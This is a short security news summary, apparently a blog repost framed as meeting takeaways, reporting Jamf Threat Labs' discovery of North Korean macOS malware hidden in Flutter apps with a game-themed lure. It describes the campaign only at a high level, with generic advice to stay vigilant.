North Korean Hackers Target macOS Using Flutter-Embedded Malware

North Korean Hackers Target macOS Using Flutter-Embedded Malware

November 12, 2024 at 08:39AM

North Korean threat actors have begun embedding malware in Flutter applications, targeting macOS devices. This technique includes a deceptive Minesweeper game and variants in Go and Python. Jamf Threat Labs notes this may involve social engineering near cryptocurrency sectors, and suspects links to known hacking sub-groups. Apple’s notarization process is bypassed.

### Meeting Takeaways – November 12, 2024

**Subject:** Malware in Flutter Applications – North Korea Threat Actors

1. **Discovery of New Malware Tactic:**
– North Korean threat actors are embedding malware within Flutter applications, targeting Apple macOS devices for the first time.

2. **Source of Discovery:**
– Jamf Threat Labs identified this malware through artifacts uploaded to the VirusTotal platform.

3. **Language Variants:**
– The malware is developed using multiple programming languages, including Golang, Python, and Dart (via Flutter).

4. **Distribution Uncertainty:**
– It remains unclear how these malware samples are distributed to victims, or if they have been used in attacks. There are indications that these may be test cases.

5. **Targeted Industries:**
– Historical trends show that North Korean actors frequently engage in social engineering against cryptocurrency and decentralized finance sectors.

6. **Potential Group Involvement:**
– While no specific North Korean hacking group is identified, there’s a likelihood of involvement from a Lazarus subgroup known as BlueNoroff.

7. **Malware Functionality:**
– Notable malware disguised as a functional game called “New Updates in Crypto Exchange (2024-08-28)” appears to utilize game-themed lures.

8. **Bypassing Apple’s Notarization:**
– The malicious apps were signed by legitimate Apple developer IDs, indicating that attackers managed to bypass Apple’s notarization process. The signatures have since been revoked.

9. **Operational Mechanism:**
– Upon launching, the malware communicates with a remote server, executing AppleScript commands received in a reversed format.

10. **Continued Development:**
– The DPRK threat actors are actively developing malware with various programming languages to target cryptocurrency firms, suggesting a strategy of frequent updates to remain undetected.

11. **Expert Insight:**
– Jaron Bradley from Jamf Threat Labs highlighted that the use of Flutter provides obscurity, making detection more challenging.

**Recommendation:** Remain vigilant about potential phishing and malware threats, particularly from applications related to cryptocurrency and finance. Ensure thorough security checks and use updated antivirus solutions to prevent infections.

For further insights and updates, consider following relevant channels on Twitter and LinkedIn.

Full Article